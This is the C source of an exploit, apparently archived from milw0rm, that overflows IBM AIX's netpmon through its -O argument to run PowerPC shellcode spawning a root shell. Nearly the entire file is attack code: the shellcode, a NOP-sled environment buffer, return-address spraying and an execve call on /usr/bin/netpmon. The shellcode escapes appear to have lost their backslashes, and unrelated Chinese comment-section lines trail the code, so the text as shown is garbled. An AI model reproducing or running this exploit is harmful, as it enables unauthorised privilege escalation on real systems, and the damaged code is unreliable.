/*
*
* IBM AIX netpmon elevated privileges exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 2048
#define EGGSIZE 2048
#define NOP 0x60
#define ADDRESS 0x2ff22fff-(BUFFERSIZE/2)
char shellcode_binsh[] =
"x7cxa5x2ax79" /* xor. r5,r5,r5 */
"x40x82xffxfd" /* bnel <shellcode> */
"x7fxe8x02xa6" /* mflr r31 */
"x3bxffx01x20" /* cal r31,0x120(r31) */
"x38x7fxffx08" /* cal r3,-248(r31) */
"x38x9fxffx10" /* cal r4,-240(r31) */
"x90x7fxffx10" /* st r3,-240(r31) */
"x90xbfxffx14" /* st r5,-236(r31) */
"x88x5fxffx0f" /* lbz r2,-241(r31) */
"x98xbfxffx0f" /* stb r5,-241(r31) */
"x4cxc6x33x42" /* crorc cr6,cr6,cr6 */
"x44xffxffx02" /* svca */
"/bin/sh"
"x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...n", count);
env_buffer[env_size - 1] = ' ';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lxn", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...n", count);
address_buffer[buffer_size - 1] = ' ';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/bin/netpmon";
args[1] = "-O";
args[2] = buffer;
args[3] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/bin/netpmon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666